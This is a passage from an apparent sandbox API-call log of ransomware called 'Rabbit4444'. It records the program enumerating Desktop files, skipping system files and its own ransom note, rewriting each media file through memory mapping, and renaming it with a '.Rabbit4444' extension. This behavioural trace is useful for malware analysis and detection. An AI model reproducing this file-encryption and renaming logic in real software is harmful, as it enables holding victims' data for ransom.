HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.062] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14137291660) returned 1 [0050.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0050.062] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.062] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.063] CloseHandle (hObject=0x298) returned 1 [0050.063] CloseHandle (hObject=0x278) returned 1 [0050.064] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\GOw9MGna.png.Rabbit4444") returned 47 [0050.064] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\GOw9MGna.png" (normalized: "c:\\users\\fd1hvy\\desktop\\gow9mgna.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\GOw9MGna.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\gow9mgna.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.066] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97802960, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x51590ba0, ftLastAccessTime.dwHighDateTime=0x1d4cb1c, ftLastWriteTime.dwLowDateTime=0x51590ba0, ftLastWriteTime.dwHighDateTime=0x1d4cb1c, nFileSizeHigh=0x0, nFileSizeLow=0x2f66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GsuT4BW5pRWHUukU9.mkv", cAlternateFileName="GSUT4B~1.MKV")) returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="Rabbit4444.exe") returned -1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2=".") returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="..") returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="windows") returned -1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="bootmgr") returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="pagefile.sys") returned -1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="boot") returned 1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="ids.txt") returned -1 [0050.066] lstrcmpiW (lpString1="GsuT4BW5pRWHUukU9.mkv", lpString2="NTUSER.DAT") returned -1 [0050.066] lstrcpyW (in: lpString1=0x130eb68, lpString2="GsuT4BW5pRWHUukU9.mkv" | out: lpString1="GsuT4BW5pRWHUukU9.mkv") returned="GsuT4BW5pRWHUukU9.mkv" [0050.066] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GsuT4BW5pRWHUukU9.mkv", dwFileAttributes=0x0) returned 1 [0050.067] lstrlenW (lpString="GsuT4BW5pRWHUukU9.mkv") returned 21 [0050.067] lstrlenW (lpString="Rabbit4444") returned 10 [0050.067] lstrcmpiW (lpString1="HUukU9.mkv", lpString2="Rabbit4444") returned -1 [0050.067] lstrlenW (lpString=".dll") returned 4 [0050.067] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0050.067] lstrlenW (lpString=".lnk") returned 4 [0050.067] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0050.067] lstrlenW (lpString=".ini") returned 4 [0050.067] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0050.067] lstrlenW (lpString=".sys") returned 4 [0050.067] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0050.067] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\GsuT4BW5pRWHUukU9.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\gsut4bw5prwhuuku9.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.067] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.067] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14137789740) returned 1 [0050.067] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=12134) returned 1 [0050.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.067] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0050.067] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3270, lpName=0x0) returned 0x298 [0050.067] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3270) returned 0x70000 [0050.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.068] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.068] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.069] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14137960871) returned 1 [0050.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.069] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0050.069] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.069] CloseHandle (hObject=0x298) returned 1 [0050.069] CloseHandle (hObject=0x278) returned 1 [0050.070] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\GsuT4BW5pRWHUukU9.mkv.Rabbit4444") returned 56 [0050.070] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\GsuT4BW5pRWHUukU9.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\gsut4bw5prwhuuku9.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\GsuT4BW5pRWHUukU9.mkv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\gsut4bw5prwhuuku9.mkv.rabbit4444"), dwFlags=0x1) returned 1 [0050.070] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2cfbde8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe2cfbde8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe6de4378, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x9ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ids.txt", cAlternateFileName="")) returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="Rabbit4444.exe") returned -1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2=".") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="..") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="windows") returned -1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="bootmgr") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="pagefile.sys") returned -1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="boot") returned 1 [0050.071] lstrcmpiW (lpString1="ids.txt", lpString2="ids.txt") returned 0 [0050.071] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x395f3a40, ftCreationTime.dwHighDateTime=0x1d4c9b6, ftLastAccessTime.dwLowDateTime=0xa4b22d50, ftLastAccessTime.dwHighDateTime=0x1d4c62f, ftLastWriteTime.dwLowDateTime=0xa4b22d50, ftLastWriteTime.dwHighDateTime=0x1d4c62f, nFileSizeHigh=0x0, nFileSizeLow=0x1693b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KSzlu5oxR5sFseX2y0.png", cAlternateFileName="KSZLU5~1.PNG")) returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="Rabbit4444.exe") returned -1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2=".") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="..") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="windows") returned -1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="bootmgr") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="pagefile.sys") returned -1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="boot") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="ids.txt") returned 1 [0050.071] lstrcmpiW (lpString1="KSzlu5oxR5sFseX2y0.png", lpString2="NTUSER.DAT") returned -1 [0050.071] lstrcpyW (in: lpString1=0x130eb68, lpString2="KSzlu5oxR5sFseX2y0.png" | out: lpString1="KSzlu5oxR5sFseX2y0.png") returned="KSzlu5oxR5sFseX2y0.png" [0050.071] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\KSzlu5oxR5sFseX2y0.png", dwFileAttributes=0x0) returned 1 [0050.071] lstrlenW (lpString="KSzlu5oxR5sFseX2y0.png") returned 22 [0050.071] lstrlenW (lpString="Rabbit4444") returned 10 [0050.071] lstrcmpiW (lpString1="seX2y0.png", lpString2="Rabbit4444") returned 1 [0050.071] lstrlenW (lpString=".dll") returned 4 [0050.071] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0050.071] lstrlenW (lpString=".lnk") returned 4 [0050.072] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.072] lstrlenW (lpString=".ini") returned 4 [0050.072] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.072] lstrlenW (lpString=".sys") returned 4 [0050.072] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.072] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\KSzlu5oxR5sFseX2y0.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kszlu5oxr5sfsex2y0.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.072] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.072] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14138255145) returned 1 [0050.072] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92475) returned 1 [0050.072] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.072] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.072] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16c40, lpName=0x0) returned 0x298 [0050.072] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16c40) returned 0x70000 [0050.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.074] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.074] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.075] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14138538603) returned 1 [0050.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.075] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.075] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.076] CloseHandle (hObject=0x298) returned 1 [0050.076] CloseHandle (hObject=0x278) returned 1 [0050.076] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\KSzlu5oxR5sFseX2y0.png.Rabbit4444") returned 57 [0050.076] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\KSzlu5oxR5sFseX2y0.png" (normalized: "c:\\users\\fd1hvy\\desktop\\kszlu5oxr5sfsex2y0.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\KSzlu5oxR5sFseX2y0.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\kszlu5oxr5sfsex2y0.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.077] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d7190a0, ftCreationTime.dwHighDateTime=0x1d4d386, ftLastAccessTime.dwLowDateTime=0x82e38ee0, ftLastAccessTime.dwHighDateTime=0x1d4d376, ftLastWriteTime.dwLowDateTime=0x82e38ee0, ftLastWriteTime.dwHighDateTime=0x1d4d376, nFileSizeHigh=0x0, nFileSizeLow=0x101ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="la3j1A5Jj.mp4", cAlternateFileName="LA3J1A~1.MP4")) returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2=".") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="..") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="windows") returned -1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="bootmgr") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="pagefile.sys") returned -1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="boot") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="ids.txt") returned 1 [0050.077] lstrcmpiW (lpString1="la3j1A5Jj.mp4", lpString2="NTUSER.DAT") returned -1 [0050.077] lstrcpyW (in: lpString1=0x130eb68, lpString2="la3j1A5Jj.mp4" | out: lpString1="la3j1A5Jj.mp4") returned="la3j1A5Jj.mp4" [0050.077] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\la3j1A5Jj.mp4", dwFileAttributes=0x0) returned 1 [0050.077] lstrlenW (lpString="la3j1A5Jj.mp4") returned 13 [0050.077] lstrlenW (lpString="Rabbit4444") returned 10 [0050.077] lstrcmpiW (lpString1="j1A5Jj.mp4", lpString2="Rabbit4444") returned -1 [0050.077] lstrlenW (lpString=".dll") returned 4 [0050.078] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.078] lstrlenW (lpString=".lnk") returned 4 [0050.078] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.078] lstrlenW (lpString=".ini") returned 4 [0050.078] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.078] lstrlenW (lpString=".sys") returned 4 [0050.078] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\la3j1A5Jj.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\la3j1a5jj.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.078] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.078] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14138862479) returned 1 [0050.078] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=65964) returned 1 [0050.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.078] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0050.078] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x104b0, lpName=0x0) returned 0x298 [0050.078] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x104b0) returned 0x70000 [0050.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.080] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.080] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14139097804) returned 1 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.080] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0050.080] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.081] CloseHandle (hObject=0x298) returned 1 [0050.081] CloseHandle (hObject=0x278) returned 1 [0050.082] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\la3j1A5Jj.mp4.Rabbit4444") returned 48 [0050.082] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\la3j1A5Jj.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\la3j1a5jj.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\la3j1A5Jj.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\la3j1a5jj.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.082] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83775340, ftCreationTime.dwHighDateTime=0x1d4c819, ftLastAccessTime.dwLowDateTime=0xbb68f30, ftLastAccessTime.dwHighDateTime=0x1d4cb9b, ftLastWriteTime.dwLowDateTime=0xbb68f30, ftLastWriteTime.dwHighDateTime=0x1d4cb9b, nFileSizeHigh=0x0, nFileSizeLow=0xf17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LnvDKMi.gif", cAlternateFileName="")) returned 1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="Rabbit4444.exe") returned -1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2=".") returned 1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="..") returned 1 [0050.082] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="windows") returned -1 [0050.083] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="bootmgr") returned 1 [0050.083] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="pagefile.sys") returned -1 [0050.083] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="boot") returned 1 [0050.083] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="ids.txt") returned 1 [0050.083] lstrcmpiW (lpString1="LnvDKMi.gif", lpString2="NTUSER.DAT") returned -1 [0050.083] lstrcpyW (in: lpString1=0x130eb68, lpString2="LnvDKMi.gif" | out: lpString1="LnvDKMi.gif") returned="LnvDKMi.gif" [0050.083] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LnvDKMi.gif", dwFileAttributes=0x0) returned 1 [0050.083] lstrlenW (lpString="LnvDKMi.gif") returned 11 [0050.083] lstrlenW (lpString="Rabbit4444") returned 10 [0050.083] lstrcmpiW (lpString1="nvDKMi.gif", lpString2="Rabbit4444") returned -1 [0050.083] lstrlenW (lpString=".dll") returned 4 [0050.083] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0050.083] lstrlenW (lpString=".lnk") returned 4 [0050.083] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0050.083] lstrlenW (lpString=".ini") returned 4 [0050.083] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0050.083] lstrlenW (lpString=".sys") returned 4 [0050.083] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0050.083] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\LnvDKMi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\lnvdkmi.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.083] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.083] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14139408055) returned 1 [0050.083] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=61820) returned 1 [0050.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0050.083] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0050.083] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf480, lpName=0x0) returned 0x298 [0050.084] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf480) returned 0x70000 [0050.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.085] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.085] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.086] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14139635732) returned 1 [0050.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0050.086] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0050.086] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.086] CloseHandle (hObject=0x298) returned 1 [0050.086] CloseHandle (hObject=0x278) returned 1 [0050.088] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\LnvDKMi.gif.Rabbit4444") returned 46 [0050.088] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\LnvDKMi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\lnvdkmi.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\LnvDKMi.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\lnvdkmi.gif.rabbit4444"), dwFlags=0x1) returned 1 [0050.089] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c158d30, ftCreationTime.dwHighDateTime=0x1d4d317, ftLastAccessTime.dwLowDateTime=0x92821ae0, ftLastAccessTime.dwHighDateTime=0x1d4c79d, ftLastWriteTime.dwLowDateTime=0x92821ae0, ftLastWriteTime.dwHighDateTime=0x1d4c79d, nFileSizeHigh=0x0, nFileSizeLow=0x17714, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m1HgOc.bmp", cAlternateFileName="")) returned 1 [0050.089] lstrcmpiW (lpString1="m1HgOc.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.089] 